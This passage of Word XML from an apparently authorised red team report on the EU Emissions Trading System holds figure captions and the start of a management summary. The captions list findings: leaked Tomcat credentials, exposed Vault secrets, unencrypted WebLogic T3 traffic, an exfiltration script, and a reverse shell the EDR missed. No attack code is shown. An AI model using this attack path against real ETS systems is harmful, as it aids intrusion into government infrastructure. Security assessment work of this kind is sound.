          <w:t>Figure 10: Acceptance EUTL PUBLIC database data.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253795 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="035984C4" w14:textId="756C3492"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6" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11: Tomcat Hydra JEE credentials found.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253796 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C46F479" w14:textId="01F42A8E"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7" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12: Hydra JEE Supervisor portal access.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253797 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="691D924F" w14:textId="258567CA"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8" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13: HashiCorp vault properties file shows secrets.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253798 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E82BE10" w14:textId="26CA3BF1"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799" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 14: Establish remote T3 connection using wlst.sh.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253799 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68C22BB9" w14:textId="02D95633"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0" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 15: Access remote WebLogic configuration using wlst.sh.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253800 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C145615" w14:textId="5386604F"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1" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 16: Unencrypted T3 connection.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253801 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="333769D4" w14:textId="09B70BFC"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2" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 17: Script for data exfiltration.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253802 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FE3A9C7" w14:textId="7439A675"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3" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 18: EDR did not detect a reverse shell and commands executed on the server.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253803 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BF5273D" w14:textId="296E81D9"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4" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 19: Oracle DB user had access to extracts database.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253804 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56EF1105" w14:textId="10E9BA6E"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5" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 20: Oracle DB user had access to secrets database.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253805 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C6CE00F" w14:textId="657E17BF"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6" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 21: Anonymous OID access.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253806 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67DC60DC" w14:textId="12E3720E" w:rsidR="001019D3" w:rsidRDefault="001019D3">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IE"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc213253807" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 22: Cleartext response from the OID.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253807 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AA94BED" w14:textId="0C7CC7B8" w:rsidR="004A6BBF" w:rsidRPr="001019D3" w:rsidRDefault="004A6BBF" w:rsidP="00F27A8E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8720"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D3092" w14:textId="5F3B87A4" w:rsidR="00EF0CF5" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00EF0CF5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc187925541"/>
      <w:bookmarkStart w:id="12" w:name="_Toc187925542"/>
      <w:bookmarkStart w:id="13" w:name="_Toc187925543"/>
      <w:bookmarkStart w:id="14" w:name="_Toc187925544"/>
      <w:bookmarkStart w:id="15" w:name="_Toc187925545"/>
      <w:bookmarkStart w:id="16" w:name="_Toc187925546"/>
      <w:bookmarkStart w:id="17" w:name="_Toc187925547"/>
      <w:bookmarkStart w:id="18" w:name="_Toc187925548"/>
      <w:bookmarkStart w:id="19" w:name="_Toc187925549"/>
      <w:bookmarkStart w:id="20" w:name="_Toc187925550"/>
      <w:bookmarkStart w:id="21" w:name="_Toc187925551"/>
      <w:bookmarkStart w:id="22" w:name="_Toc187925552"/>
      <w:bookmarkStart w:id="23" w:name="_Toc187925553"/>
      <w:bookmarkStart w:id="24" w:name="_Toc187925554"/>
      <w:bookmarkStart w:id="25" w:name="_Toc187925555"/>
      <w:bookmarkStart w:id="26" w:name="_Toc187925556"/>
      <w:bookmarkStart w:id="27" w:name="_Toc187925557"/>
      <w:bookmarkStart w:id="28" w:name="_Toc187925558"/>
      <w:bookmarkStart w:id="29" w:name="_Toc187925559"/>
      <w:bookmarkStart w:id="30" w:name="_Toc187925560"/>
      <w:bookmarkStart w:id="31" w:name="_Toc187925561"/>
      <w:bookmarkStart w:id="32" w:name="_Toc187925562"/>
      <w:bookmarkStart w:id="33" w:name="_Toc187925563"/>
      <w:bookmarkStart w:id="34" w:name="_Toc187925564"/>
      <w:bookmarkStart w:id="35" w:name="_Toc187925565"/>
      <w:bookmarkStart w:id="36" w:name="_Toc187925566"/>
      <w:bookmarkStart w:id="37" w:name="_Toc212654623"/>
      <w:bookmarkStart w:id="38" w:name="_Toc467505740"/>
      <w:bookmarkStart w:id="39" w:name="_Toc467505766"/>
      <w:bookmarkStart w:id="40" w:name="_Toc467505875"/>
      <w:bookmarkStart w:id="41" w:name="_Toc467505901"/>
      <w:bookmarkStart w:id="42" w:name="_Toc213253529"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="6"/>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1019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Management summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3295E790" w14:textId="4B0AFC74" w:rsidR="00D02E92" w:rsidRPr="001019D3" w:rsidRDefault="00D02E92" w:rsidP="00D02E92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc187925697"/>
      <w:bookmarkStart w:id="44" w:name="_Toc212654624"/>
      <w:bookmarkStart w:id="45" w:name="_Toc156556669"/>
      <w:bookmarkStart w:id="46" w:name="_Toc213253530"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Synopsis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="450A3D9F" w14:textId="2E43FED7" w:rsidR="000B6935" w:rsidRPr="001019D3" w:rsidRDefault="00421B5F" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">DG </w:t>
      </w:r>
      <w:r w:rsidR="00E76B76" w:rsidRPr="001019D3">
        <w:t>CLIMA</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> responsible for managing </w:t>
      </w:r>
      <w:r w:rsidR="00EA7B7B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>Emissions Trading System (ETS)</w:t>
      </w:r>
      <w:r w:rsidR="009971FE" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA7B7B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">information </w:t>
      </w:r>
      <w:r w:rsidR="0009556A" w:rsidRPr="001019D3">
        <w:t>system requested</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> a Red Team </w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t>campaign</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to be performed </w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> ETS ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C0359" w14:textId="1A862C80" w:rsidR="00A27448" w:rsidRPr="001019D3" w:rsidRDefault="005E6AE9" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002521CD" w:rsidRPr="001019D3">
        <w:t>scope</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> of the</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> campaign</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> was</w:t>
      </w:r>
      <w:r w:rsidR="003C0500" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to assess</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="003C0500" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> resilience of the</w:t>
      </w:r>
      <w:r w:rsidR="000B6935" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:t>ETS (including EUTL and EUCR)</w:t>
      </w:r>
      <w:r w:rsidR="0009556A" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE393F" w:rsidRPr="001019D3">
        <w:t>environment</w:t>
      </w:r>
      <w:r w:rsidR="003C0500" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and the hardening of the deployed </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>defences against real-world adversary tactics</w:t>
      </w:r>
      <w:r w:rsidR="003C0500" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DECFDA8" w14:textId="667001FB" w:rsidR="00A27448" w:rsidRPr="001019D3" w:rsidRDefault="005E6AE9" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The Red Team campaign was conducted by DIGIT.S1 from</w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00D837FF" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> of January 2025</w:t>
      </w:r>
      <w:r w:rsidR="0009556A" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:t>until</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0009556A" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> of August 2025</w:t>
      </w:r>
      <w:r w:rsidR="00D837FF" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B972F" w14:textId="58FF7E66" w:rsidR="005E6AE9" w:rsidRPr="001019D3" w:rsidRDefault="005E6AE9" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00D837FF" w:rsidRPr="001019D3">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="000F3DE9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t>campaign</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> focused on capturing predefined flags and extracting fictional data </w:t>
      </w:r>
